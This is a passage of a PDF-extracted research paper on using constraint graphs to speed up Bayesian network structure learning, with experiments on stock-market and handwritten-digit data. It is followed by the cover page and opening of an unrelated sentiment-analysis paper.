reduce the computational time past simply skipping over invalid graphs. We propose the idea of a ‘‘constraint graph’’ as a method for incorporating prior information into the BNSL task. A constraint graph is a directed graph where each node represents a set of variables in the BNSL problem and edges represent which variables are candidate parents for which other variables. The primary advantage of constraint graphs versus other methods is that the structure of the constraint graph can be used to achieve savings in both memory cost and computational time beyond simply eliminating invalid structures. This is done by breaking the problem into independent subproblems even in the presence of cyclic prior knowledge. An example of this cyclic prior knowledge is identifying two groups of variables that can draw parents only from each other, similar to a biparte graph. It can be difficult to identify the best parents for each variable that does not result in a cycle in the learned structure. In addition, constraint graphs are visually more intuitive than a set of written rules while also typically being simpler than a super-structure, because constraint graphs are defined over sets of variables instead of the original variables themselves. This intuition, combined with automatic methods for identifying parallelizable subproblems, makes constraint graphs easy for non-experts to define and use without requiring them to know the details of the structure learning task. This technique is similar to work done by Fan, Malone & Yuan (2014), where the authors describe the same computational gains through the identification of ‘‘potentially optimal Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 Group using Constraint Graph Use Constraints to Guide Structure Learning A B D De�ne directed super-structure C Figure 1 A constraint graph grouping variables. (A) We wish to learn a Bayesian network over 11 variables. The variables are colored according to the group that they belong to, which is defined by the user. These variables can either (B) be organized into a directed super structure or (C) grouped into a constraint graph to encode equivalent prior knowledge. Both graphs define the superset of edges which can exist, but the constraint graph uses far fewer nodes and edges to encode this knowledge. (D) Either technique can then be used to guide the BNSL task to learn the optimal Bayesian network given the constraints. parent sets.’’ One difference is that Fan et al. define the constraints on individual variables instead of on sets on variables, as this work does. By defining the constraints on sets of variables instead of individual ones, one can identify further computational gains when presented with cyclic prior knowledge. Given that two types of graphs will be discussed throughout this paper, the Bayesian network we are attempting to learn and the constraint graph, we will use the terminology ‘‘variable’’ exclusively in reference to the Bayesian network and ‘‘node’’ exclusively in reference to the constraint graph. CONSTRAINT GRAPHS A constraint graph is a directed graph in which nodes contain disjoint sets of variables from the BNSL task, and edges indicate which sets of variables can serve as parents to which other sets of variables. A self-loop in the constraint graph indicates that no prior knowledge is known about the relationship between variables in that node, whereas a lack of a self-loop indicates that no variables in that particular node can serve as parents for another variable in that node. Thus, the naive BNSL task can be represented as a constraint graph consisting of a single node with a self-loop. A constraint graph can be thought of as a way to group the variables (Fig. 1A), define relationships between these groups (Fig. 1C), and then guide the BNSL task to efficiently find the optimal structure given these constraints (Fig. 1D). In contast, a directed super-structure defines all possible edges that can exist in accordance with the prior knowledge (Fig. 1B). Typically, a directed super-structure is far more complicated than the equivalent constraint graph. Cyclic prior knowledge can be represented as a simple cycle in the constraint graph, such that the variables in node A draw their parents solely from node B, and B from A. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 Any method for reducing computational time through prior knowledge exploits the ‘‘global parameter independence property’’ of BNSL. Briefly, this property states that the optimal parents for a variable are independent of the optimal parents for another variable given that the variables do not form a cycle in the resulting Bayesian network. This acyclicity requirement is typically computationally challenging to determine because a cycle can involve more variables than the ones being directly considered, such as a graph which is simply a directed loop over all variables. However, given an acyclic constraint graph or an acyclic directed super-structure, it is impossible to form a cycle in the resulting structure; hence, the optimal parent set for each variable can be identified independently from all other variables. A convenient property of constraint graphs, and one of their advantages relative to other methods, is that independent subproblems can be found through global parameter independence even in constraint graphs which contain cycles. We describe in ‘Solving a component of the constraint graph’ the exact algorithm for finding optimal parent sets for each case one can encounter in a constraint graph. Briefly, the constraint graph is first broken up into its strongly connected components (SCCs) that identify which variables can have their parent sets found independently from all other variables (‘‘solving a component’’) without the possibility of forming a cycle in the resulting graph. Typically these SCCs will be single nodes from the constraint graph, but may be comprised of multiple nodes if cyclic prior knowledge is being represented. In the case of an acyclic constraint graph, all SCCs will be single nodes, and in fact each variable can be optimized without needing to consider other variables, in line with theoretical results from Ordyniak & Szeider (2013). In addition to allowing these problems to be solved in parallel, this breakdown suggests a more efficient method of sharding the data in a distributed learning context. Specifically, one can assign an entire SCC of the constraint graph to a machine, including all columns of data corresponding to the variables in that SCC and all variables in nodes which are parents to nodes in the SCC. Given that all subproblems which involve this shard of the data are contained in this SCC of the constraint graph, there will never be duplicate shards and all tasks involving a shard are limited to the same machine. The concept of identifying SCCs as independent subproblems has also been described in Fan, Malone & Yuan (2014). It is possible to convert any directed super-structure into a constraint graph and vice- versa though it is far simpler to go from a constraint graph to a directed super-structure. To convert from a directed super-structure to a constraint graph, one must first identify all strongly connected components that are more than a single variable. All variables in a strongly connected component can be put into the same node in a constraint graph that contains a self loop. Then, one would tabulate the unique parent and children sets a variable can have. All variables outside of the previously identified strongly connected components with the same parent and children sets can be grouped together into a node in the constraint graph. Edges then connect these sets based on the shared parent sets specified for each node. In the situation where a node in the constraint graph can draw parents from only a subset of the variables in a node created by the identification of the strongly connected components, the node must be broken into two nodes that both have self loops and loops connecting to each other to allow for only a subset of those variables Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 to serve as a parent for another node. In contrast, to convert from a constraint graph to a directed super-structure one would simply draw, for each node, an edge from all variables in the current node to all variables in the node’s children. We suggest that constraint graphs are the more intuitive method both due to their simpler representation and ease of extracting computational benefits from the task. METHODS Bayesian network structure learning Although solving a component in a constraint graph can be accomplished by a variety of algorithms including heuristic algorithms, we assume for this paper that one is using some variant of the exact dynamic programming algorithm proposed by Malone, Yuan & Hansen (2011). We briefly review that algorithm here. The goal of the algorithm is to identify the optimal Bayesian network defined over the set of variables without having to repeat any calculations and without having to use excessive memory. This is done by defining additional graphs, the parent graphs and the order graph. We will refer to each node in these graphs as ‘‘entries’’ to distinguish them from the constraint graph and the learned Bayesian network. A parent graph is defined for each variable and can be defined as a lattice, where the entries to some layer i correspond to combinations of all other variables of size i. Each entry is connected to the entries in the previous layers that are subsets of that entry such that (X1,X2) would be connected to both X1 and X2. For each entry, the score of the variable is calculated using the parents in the entry and compared to the scores held in the parent entries, recording only the best scoring value and parent set amongst them. These entries then hold the dynamically calculated best parent set and associated score, allowing for constant time lookups later on the best parent set given a set of possible parents. The order graph is structured in the same manner as the parent graphs except over all variables. In contrast with the parent graphs, it is the edges that store useful information in the form of the score associated with adding a given variable to the set of seen variables stored in the entry and the parent set that yields this score. Each path from the empty root node to the leaf node containing the full set of variables encodes the optimal network given a topological sort of the variables, and the shortest path encodes the optimal network. This data structure reduces the time required to find the optimal Bayesian network from O(n2n(n−1)) time in the number of variables to O(n2n) time in the number of variables without the need to keep a large cache of values. Structure learning is flexible with respect to the score function used to identify the optimal graph. There are many score functions that typically aim to penalize the log likelihood of the data by the complexity of the graph to encourage sparser structures. These usually come in the form of Bayesian score functions, such as Bayesian-Dirichlet (Heckerman, Geiger & Chickering, 1995), or those derived from information theory, such as minimum description length (MDL) (Suzuki, 1996). Most score functions decompose across variables of a Bayesian network according to the global parameter independence property, such that the score for a dataset given a model is equal to the product of the score of each variable given its parents. While constraint graphs remain agnostic to the specific Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 score function used, we assume that MDL is used as it has several desirable computational benefits. For review, MDL defines the score as the following: MDL(D|M)=P(D|M)− 1 2 log(N)|B| (1) where |B| defines the number of parameters in the network. The term ‘‘minimum description length’’ arises from needing 12 log(N) bits to represent each parameter in the model, making the second term the total number of bits needed to represent the full model. The MDL score function has the convenient property that a variable cannot have more than log ( n log(n) ) parents given n samples, greatly reducing computational time. Solving a component of the constraint graph The strongly connected components of a constraint graph can be identified using Tarjan’s algorithm (Tarjan, 1971). Each SCC corresponds to a subproblem of the constraint graph and can be solved independently. In many cases the SCC will be a single node of the constraint graph, because prior knowledge is typically not cyclic. In general, the SCCs of a constraint graph can be solved in any order due to the global parameter independence property. The algorithm for solving an SCC of a constraint graph is a straightforward modification of the dynamic programming algorithm described above. Specifically, parent graphs are created for each variable in the SCC but defined only over the union of possible parents for that variable. Consider the case of a simple, four-node cycle with no self-loops such that W →X →Y →Z →W . A parent graph is defined for each variable in W ∪X∪Y ∪Z but only over valid parents. For example, the parent graph for X1 would be over only variables in W . Then, an order graph is defined with entries that violate the edge structure of the constraint graph filtered out. The first layer of the order graph would be unchanged with only singletons, but the second layer would prohibit entries with two variables from the same layer because there are no valid orderings in which Xi is a parent of Xj, and would prohibit entries in which a variable W is joined with a variable of Y . One can identify valid entries by taking the entries of a previous layer and iterating over each variable present, adding all valid parents for that variable which are not already present in the set. A simple example illustrating the algorithm is a constraint graph made up of a four node cycle where each node contains only a single variable (Fig. 2A). The parent graphs defined for this would consist solely of two entries, the null entry and the entry corresponding to the only valid parent. The first layer of the order graph would be all variables as previously (Fig. 2B). However, once a variable is chosen to start the topological ordering the order of the remaining variables is fixed because of the constraints, producing a far simpler lattice. Because constraint graphs can encode a wide variety of different constraints, the complexity of the task depends on the structure of the constraint graph. Broadly, the results from Ordyniak & Szeider (2013) still hold, namely, that acyclic constraint graphs can be solved in quadratic time. As was found in Fan, Malone & Yuan (2014), because each SCC can be solved independently, the time complexity for constraint graphs containing a cycle corresponds to the time complexity of the worst case component. Fortunately, although Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 (0, 1) (0, 1, 2) (0, 1, 2, 3) (1, 2) (1, 2, 3) (0,) (1,) (2,) (2, 3) (0, 2, 3) (3,) (0, 3) (0, 1, 3) (,) 0 1 2 3 A B Figure 2 An example of a constraint graph and resulting order graph. (A) A constraint graph is defined as a cycle over four nodes with each node containing a single variable. (B) The resulting order graph dur- ing the BNSL task. It is significantly sparser than the typical BNSL task because after choosing a variable to start the topological ordering the remaining variables must be added in the order defined by the cycle. the complexity of a node engaging in a cycle is still exponential, it is only exponential with respect to the number of variables that node interacts with. Adding additional, equally sized nodes to the constraint graph only causes the algorithm to grow linearly in time and has no additional memory cost if the components are solved sequentially. The algorithm described above has five natural cases and are described below. One node, no parents, no self loop: The variables in this node contain no parents, so nothing needs to be done to find the optimal parent sets given the constraints. This naturally takes O(1) time to solve. One node, no parents, self loop: This is equivalent to exact BNSL with no prior knowledge. In this case, the previously proposed dynamic programming algorithm is used to identify the optimal structure of the subnetwork containing only variables in this node. This takes O(n2n) time where n is the number of variables in the node. One node, one or more parent nodes, no self loop: In this case it is impossible for a cycle to be formed in the resulting Bayesian network regardless of optimal parent sets, so we can justify solving every variable in this node independently by the global parameter independence property. Doing so results in a significant improvement over applying the algorithm naively because neither the parent graphs nor the order graph need to be explicitly calculated or stored. The optimal parent set can be calculated without the need for dynamic programming because the optimal topological ordering does not need to be discovered. Because no dynamic programming needs to be done, there is no need to store either the parent or order graphs in memory. This takes O(nmk) time, where n is the number of variables in the node, m is the number of possible parents, and k is the maximum number of parents that a node can have, in this case set by the MDL algorithm. If k is set to any constant value, then this step requires quadratic time with respect to the number of possible parents and linear with respect to the number of variables in the node. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 7/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 One node, one or more parents, self loop: Initially, one may think that solving this SCC could involve taking the union of all variables from all involved nodes, running exact BNSL over the full set, and simply discarding the parent sets learned for the variables not in the currently considered node. However, in the same way that one should not handle prior knowledge by learning the optimal graph over all variables and discarding edges which offend the prior knowledge, one should not do the same in this case. Instead, a modification to the dynamic programming algorithm itself can be made to restrict the parent sets on a variable-by-variable basis. For simplicity, we define the variables in the current node of the constraint graph as X and the union of all variables in the parent nodes in the constraint graph as Y . We begin by setting up an order graph, as usual defined over X. We then add Y to each node in the order graph such that the root node now is now comprised of Y instead of the empty set and the leaf node is comprised of X∪Y instead of just X. Because the primary purpose of the order graph is to identify the optimal parent sets that do not form cycles, this addition is intuitive because it is impossible to form a cycle by including any of the variables in Y as parents for any of the variables in X. In other words, if one attempted to find the optimal topological ordering over X∪Y it would always begin with the variables in Y but would be invariant to the ordering of Y . Parent graphs are then created for all variables in X but are defined over the set of all variables in X∪Y , because that is the full set of parents that the variables could be drawn from. This restriction allows the optimal parents for each variable in X to be identified without wasting time considering what the parent set for variables in Y should be, or potentially throwing away the optimal graph because of improper edges leading from a variable in Y to a variable in X. This step takes O(n2n+m) time, where n is the number of variables in the node and m is the number of variables in the parent nodes. This is because we only need to define a parent graph for the variables in the node we are currently considering, but these parent graphs must be defined over all variables in the node plus all the variables in the parent nodes. Multiple nodes: The algorithm as presented initially is used to solve an entire component at the same time. RESULTS While it is intuitive how a constraint graph provides computational gains by splitting the structure learning task into subproblems, we have thus far only alluded to the idea that prior knowledge can provide efficiencies past that. In this section we examine the computational gains achieved in the three non-trivial cases of the algorithm presented in ‘Solving a component of the constraint graph’. Acyclic constraint graphs can model the global stock market First, we examine the computational benefits of an acyclic constraint graph modeling the global stock market. In particular, we want to identify for each stock which other stocks are predictive to its performance. We chose to do this by learning a Bayesian network over the opening and closing prices of 54 top performing stocks from the New York Stock Exchange (NYSE) in the United States, the Tokyo Stock Exchange (TSE) in Japan, and the Financial Times Stock Exchange (FTSE) in England. Learning a Bayesian network Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 8/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 AAPL-open XOM-close MSFT-open RTN-close ORCL-close GOOGL-open COB-close GOOGL-closeBRK.A-close JNJ-open GFRD-close WFC-close GE-close PG-open RDSB-close FB-close T-closeCVX-close VZ-open T-open DEB-close VED-open BWNG-open BWNG-close KEISEI-open Time TSE FTSE NYSE A B Opening Closing Figure 3 A section of the learned Bayesian network of the global stock market. (A) The constraint graph contains six nodes, the opening and closing prices for each of the three markets. These are con- nected such that the closing prices in a market depend on the opening prices but also the most recent in- ternational activity. (B) The most connected subset of stocks from the learned network covering 25 vari- ables. over all 108 variables is clearly infeasible, so we encode in our constraint graph some common-sense restrictions (Fig. 3A). Specifically, opening and closing prices for the same market are grouped into separate nodes, for a total of six nodes in the constraint graph. There are no self-loops because the opening price of one stock does not influence the opening price of another stock. Naturally, the closing prices of one group of stocks are influenced by the opening price of the stocks from the same market, but they are also influenced by the opening or closing prices of any markets which opened or closed in the meantime. For instance, the TSE closes after the FTSE opens, so the FTSE opening prices have the opportunity to influence the TSE closing prices. However, the TSE closes before the NYSE opens, so the NYSE cannot influence those stock prices. The dataset consists of opening and closing prices from these stocks between December 2nd, 2015 and November 29th, 2016, binarized to indicate whether the value was an increase compared to the prior price seen. The resulting Bayesian network has some interesting connections (Fig. 3B). For example, the opening price of Microsoft influences the closing price of Raytheon, and the closing price of Debenhams plc, a British multinational realtor, influences the closing price of GE. In addition, there were some surprising and unexplained connections, such as Google and Johnson & Johnson influencing the closing price of Cobham plc, a British defense firm. Given that this example is primarily to illustrate the types of constraints a constraint graph can easily model, we suggest caution in thinking too deeply about these connections. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 Table 1 Model comparison between naive Bayes, Bayesian network classifiers (BNC), and random for- est. Three algorithms were evaluated on the UCI handwritten digits dataset, fed in the binarized value cor- responding to whether the intensity of a pixel was above average. The fitting time and test set accuracy are reported for each algorithm. Model Train time (s) Test set accuracy Naive Bayes 0.05 0.79 BNC 0.5 0.81 Random forest 1.4 0.89 It took only∼35 s on a computer with modest hardware to run BNSL over 250 samples. If we set the maximum number of parents to three, which is the empirically determined maximum number of parents, then it only takes∼2 s to run. In contrast it would be infeasi- ble to run the exact BNSL algorithm on even half the number of variables considered here. Constraint graphs allow learning of Bayesian network classifiers Bayesian network classifiers are an extension of Bayesian networks to supervised learning tasks by defining a Bayesian network over both the feature variables and the target variables together. Normal inference methods are used to predict the target variables given the observed feature variables. In the case where feature variables are always observed, only the Markov blanket of the target variables must be defined, i.e., their parents and children. The other variables are independent of the target variables and can be discarded, serving as a form of feature selection. A popular Bayesian network classifier is the naive Bayes classifier that defines a single class variable as the parent to all feature variables. A natural extension to this method is to learn which features are useful, instead of assuming they all are, thereby combining feature selection with parameter learning in a manner that has some similarities to decision trees. This approach can be modeled by using a constraint graph that has all feature variables X in one node and all target variables y in its parent node, such that y →X. We empirically evaluated the performance of learning a simple Bayesian network classifier on the UCI Digits Dataset. The digits dataset is a collection of 8 × 8 images of handwritten digits, where the features are discretized values between 0 and 16 representing the intensity of that pixel and the labels are between 0 and 9 representing the digit stored there. We learn a Bayesian network where the 64 pixels are in one node in the constraint graph and the class label is by itself it another node in the constraint graph that serves as a parent. We then train a Bayesian network classifier, a naive Bayes classifier, and a random forest classifier comprised of 100 trees, on a test set of 1,500 images and test their performance on a held out 297 images. As expected, the learned Bayesian network classifier falls between naive Bayes and the random forest in terms of both training time and test set performance (Table 1). Futhermore, more complicated Bayesian network classifiers can be learned with different constraint graphs. One interesting extension is that instead of constraining all features to be children of the target variable, to allow features to be either parents or children of the target variable. This can be specified by a cyclic constraint graph where y →X →y, preventing Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 Table 2 Algorithm comparison on a node with a self loop and other parents. The exact algorithm and the constrained algorithm proposed here were on a SCC comprosied of a main node with a self loop and one parent node. Shown are the results of increasing the number of variables in the main node while keep- ing the variables in the parent node steady at five, and the results of increasing the number of variables in the parent node while keeping the number of variables in the main node constant. For both algorithms we show the number of nodes across all parent graphs (PGN), the number of nodes in the order graph (OGN), the number of edges in the order graph (OGE) and the time to compute. Exact Constraint graph PGN OGN OGE Time (s) PGN OGN OGE Time (s) Variables 4 2,304 512 2,304 0.080 1,024 16 32 0.033 8 53,248 8,192 53,248 1.30 32,768 256 1,024 0.545 12 1,114,112 131,072 1,114,112 27.03 786,432 4,096 24,576 9.56 Parents 4 2,304 512 2,304 0.087 1,280 32 80 0.045 8 53,248 8,192 53,258 1.401 20,480 32 80 0.356 12 1,114,112 131,072 1,114,112 27.22 327,680 32 80 4.01 the model from spending time identifying dependencies between the features. Finally, in cases where some features may be missing, it may be beneficial to model all dependencies between the features in order to allow inference to flow from observed variables not directly connected to the target variables to the target variables. This can be modeled by adding a self loop on the features variables X, allowing all edges to be learned except those between pairs of target variables. Learning a Bayesian network classifier in this manner will suffer from the same computational challenges as an unconstrained version, given the looseness of the constraints. Self-loops and parents We then turn to the case where the strongly connected component is a main node with a self loop and a parent node. Because an order graph is defined only over the variables in the main node its size is invariant to the number of variables in the parent node, allowing for speed improvements when it comes to calculating the shortest path. In addition, parent graphs are only defined for variables in the parent set, and so while they are not smaller than the ones in the exact algorithm, there are fewer. We compare the computational time and complexity of the underlying order and parent graphs between the exact algorithm over the full set of variables and the modified algorithm based on a constraint graph (Table 2). The data consisted of randomly generated binary values, because the running time does not depend on the presence of underlying structure in the data. We note that in all cases there are significant speed improvements and simpler graphs but that there are particularly encouraging speed improvements when the number of variables in the main node are increased. This suggests that it is always worth the time to identify which variables can be moved from a node with a self loop to a separate node. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 11/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 C D A B Figure 4 Cyclic constraint graphs. (A) This constraint graph is comprised of a simple two node cy- cle with each node containing four variables. (B) The learned Bayesian network on random data where some variables were forced to identical values. Each circle here corresponds to a variable in the resulting Bayesian network instead of a node in the constraint graph. There were multiple possible cycles which could have been formed but the constraint graph prevented that from occuring. (C) This constraint graph now encodes a four node cycle each with four variables. (D) The learned Bayesian network on random data with two distinct loops of identical values forced. Again, no loops are formed. Cyclic constraint graphs Lastly, we consider constraint graphs that encode cyclic prior knowledge. We visually inspect the results from cyclic constraint graphs to ensure that they do not produce cyclic Bayesian networks even when the potential exists. Two separate constraint graphs are inspected, a two node cycle and a four node cycle (Figs. 4A and 4C). The dataset is comprised of random binary values, where the value of one variable in the cycle is copied to the other variables in the cycle to add synthetic structure. However, by jointly solving all nodes cycles are avoided while dependencies are still captured (Figs. 4B and 4D). We then compare the exact algorithm without constraints to the use of an appropriate constraint graph in a similer manner as before (Table 3). This is done first for four node cycles where we increase the number of variables in each node of the constraint graph and then for increasing sized cycles with three variables per node. The exact algorithm likely produces structures that are invalid according to the constraints and so this comparison is done solely to highlight that efficiencies are gained by considering the constraints. In each case using a constraint graph yields simpler parent and order graphs and the computational time is significantly reduced. The biggest difference is in the number of nodes in the parent graphs, as the constraints place significant limitations on which variables are allowed to be parents for which other variables. Since the construction of the parent graph is the only part of the algorithm which considers the dataset itself it is unsurprising that significant savings are achieved for larger datasets when much smaller parent graphs are used. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 Table 3 Algorithm comparison on a cyclic constraint graph. The exact algorithm and the constrained algorithm proposed here were run for four node cycles with differing numbers of variables, cycles with different numbers of nodes but three variables per node, and differing numbers of sam- ples for a four-node, three-variable cycle. All experiments with differing numbers of variables or nodes were run on 1,000 randomly generated sam- ples. Shown for both algorithms are the number of nodes across all parent graphs (PGN), the number of nodes in the order graph (OGN), the num- ber of edges in the order graph (OGE) and the time to compute. Since the number of nodes does not change as a function of samples those values are not repeated in the blank cells. Exact Exact PGN OGN OGE Time (s) PGN OGN OGE Time (s) Variables 1 32 16 32 0.005 8 14 16 0.005 2 1,024 256 1,024 0.036 32 186 544 0.014 3 24,576 4,096 24,576 0.611 96 3,086 16,032 0.320 4 524,288 65,536 525,288 14.0 256 54,482 407,328 7.12 Nodes 2 192 64 192 0.111 48 56 150 0.008 4 24,576 4,096 24,576 0.634 96 3,086 16,032 0.217 6 2,359,296 262,144 2,359,296 60.9 144 168,068 1,307,358 26.12 Samples 100 24,576 4,096 24,576 0.357 96 3,086 16,032 0.311 1,000 – – – 0.615 – – – 0.211 10,000 – – – 2.670 – – – 0.357 100,000 – – – 243.9 – – – 10.41 DISCUSSION Constraint graphs are a flexible way of encoding into the BNSL task prior knowledge concerning the relationships among variables. The graph structure can be exploited to identify potentially massive computational gains, and acyclic constraint graphs make problems tractable which would be infeasible to solve without constraints. This is particularly useful in cases where there are both a great number of variables and many constraints present from prior knowledge. We anticipate that the automatic manner in which parallelizable subtasks are identified in a constraint graph will be of particular interest given the recent increase in availability of distributed computing. Although the networks learned in this paper are discrete, the same principles can be applied to all types of Bayesian networks. Because the constraint graph represents only a restriction in the parent set on a variable-by-variable basis, the same algorithms that are used to learn linear Gaussian or hybrid networks can be seamlessly combined with the idea of a constraint graph. In addition, most of the approximation algorithms which have been developed for BNSL can be modified to take into account constraints because these algorithms simply encode a limitation on the parent set for each variable. One could extend constraint graphs in several interesting ways. The first is to assign weights to edges so that the weight represents the prior probability that the variables in the parent set are parents of the variables in the child set, perhaps as pseudocounts to take into account when coupled with a Bayesian scoring function. A second way is to incorporate ‘‘hidden nodes’’ that are variables which model underlying, onobserved phenomena and Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.122 can be used to reduce the parameterization of the network. Several algorithms have been proposed for learning the structure of a Bayesian network given hidden variables (Elidan et al., 2001; Elidan & Friedman, 2005; Friedman, 1997). Modifying these algorithms to obey a constraint graph seems like a promising way to incorporate restrictions on this difficult task. A final way may be to encode ancestral relationships instead of direct parent relationships, indicating that a given variable must occur at some point before some other variable in the topological ordering. ACKNOWLEDGEMENTS We would like to acknowledge Maxwell Libbrecht, Scott Lundberg, and Brandon Malone for many useful discussions and comments on drafts of the paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by an NSF IGERT grant DGE-1258485. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NSF IGERT: DGE-1258485. Competing Interests The authors declare there are no competing interests. Author Contributions • Jacob M. Schreiber conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • William S. Noble analyzed the data, wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Code implementing the concept is available at GitHub: www.github.com/jmschrei/pomegranate Data and code reproducing the figures are available at GitHub: https://github.com/ jmschrei/constraint_graphs. REFERENCES Campos C, Ji Q. 2011. Efficient structure learning of bayesian networks using constraints. Journal of Machine Learning Research 12:663–689. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 14/16 https://peerj.com www.github.com/jmschrei/pomegranate https://github.com/jmschrei/constraint_graphs https://github.com/jmschrei/constraint_graphs http://dx.doi.org/10.7717/peerj-cs.122 Chow C, Liu C. 1968. Approximating discrete probability distributions with dependence trees. IEEE Transactions on Information Theory 14(3):462–467. Cooper G, Herskovits E. 1992. A Bayesian method for the induction of probabilistic networks from data. Machine Learning 9:309–347 DOI 10.1007/BF00994110. Elidan G, Friedman N. 2005. Learning hidden variable networks: the information bottleneck approach. Journal of Machine Learning Research 6:81–127. Elidan G, Lotner N, Friedman N, Koller D. 2001. Discovering hidden variables: a structure-based approach. In: Leen TK, Dietterich TG, Tresp V, eds. Advances in neural information processing systems (NIPS), vol. 13, 479–485. Fan X, Malone BM, Yuan C. 2014. Finding optimal Bayesian network structures with constraints learned from data. In: UAI’14 proceedings of the thirtieth conference on uncertainty in artificial intelligence, 200–209. Friedman N. 1997. Learning belief networks in the presence of missing values and hidden variables. In: ICML’97 proceedings of the fourteenth international conference on machine learning, 125–133. Gamberoni G, Lamma E, Riguzzi F, Storari S, Volinia S. 2005. Bayesian networks learn- ing for gene expression datasets. In: Advances in intelligent data analysis VI: 6th inter- national symposium on intelligent data analysis, 109–120 DOI 10.1007/11552253_11. Heckerman D, Geiger D, Chickering D. 1995. Learning Bayesian networks: the combina- tion of knowledge and statistical data. Machine Learning 20:197–242. Jaakkola T, Sontag D, Globerson A, Meila M. 2003. Learning Bayesian network structure using LP relaxations. In: Proceedings of the thirteenth international conference on artificial intelligence and statistics (AISTATS-10), 358–365. Malone BM, Yuan C, Hansen EA. 2011. Memory-efficient dynamic programming for learning optimal Bayesian networks. In: Proceedings of the twenty-fifth AAAI conference on artificial intelligence. Moore A, Wong W. 2003. Optimal reinsertion: a new search operator for accelerated and more accurate bayesian network structure learning. In: Proceedings of the 20th international conference on machine learning (ICML-03), 552–559. Ordyniak S, Szeider S. 2013. Parameterized complexity results for exact Bayesian network structure learning. Journal of Artificial Intelligence Research 46:263–302. Perrier E, Imoto S, Miyano S. 2008. Finding optimal Bayesian network given a super- structure. Journal of Machine Learning Research 9:2251–2286. Schneiderman H. 2004. Learning a restricted Bayesian network for object detection. In: Proceedings of the 2004 IEEE computer society conference on computer vision and pattern recognition. IEEE, 639–646. Suzuki J. 1996. Learning Bayesian belief networks based on the minimum description length principle: an efficient algorithm using the B & B Technique. In: Machine learning, proceedings of the thirteenth international conference (ICML’96). Tarjan R. 1971. Depth-first search and linear graph algorithms. SIAM Journal of Computing 2:146–160. Tsamardinos I, Brown LE, Aliferis CF. 2006. The max–min hill-climbing Bayesian network structure learning algorithm. Machine Learning 65:31–78. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 15/16 https://peerj.com http://dx.doi.org/10.1007/BF00994110 http://dx.doi.org/10.1007/11552253_11 http://dx.doi.org/10.7717/peerj-cs.122 Yuan C, Malone BM, Wu X. 2011. Learning optimal Bayesian networks using A* search. In: IJCAI proceedings-international joint conference on artificial intelligence. Zhou H, Sakane S. 2003. Learning Bayesian network structure from environment and sensor planning for mobile robot localization. In: Proceedings of IEEE international conference on multisensor fusion and integration for intelligent systems, MFI2003 DOI 10.1109/MFI-2003.2003.1232636. Zuo Y, Kita E. 2012. Up/down analysis of stock index by using Bayesian network. Engineering Management Research 1:46–52. Schreiber and and Noble (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.122 16/16 https://peerj.com http://dx.doi.org/10.1109/MFI-2003.2003.1232636 http://dx.doi.org/10.7717/peerj-cs.122 work_ndtqmncagrai7ec23g3kd4qk34 ---- Edinburgh Research Explorer Multiple Instance Learning Networks for Fine-Grained Sentiment Analysis Citation for published version: Angelidis, S & Lapata, M 2018, 'Multiple Instance Learning Networks for Fine-Grained Sentiment Analysis', Transactions of the Association for Computational Linguistics, vol. 6, pp. 17-32. <https://transacl.org/ojs/index.php/tacl/article/view/1225> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://transacl.org/ojs/index.php/tacl/article/view/1225 https://www.research.ed.ac.uk/portal/en/publications/multiple-instance-learning-networks-for-finegrained-sentiment-analysis(9b105752-9eb8-4c59-8cad-2fbc13702c8d).html Multiple Instance Learning Networks for Fine-Grained Sentiment Analysis Stefanos Angelidis and Mirella Lapata Institute for Language, Cognition and Computation School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB s.angelidis@ed.ac.uk, mlap@inf.ed.ac.uk Abstract We consider the task of fine-grained senti- ment analysis from the perspective of multi- ple instance learning (MIL). Our neural model is trained on document sentiment 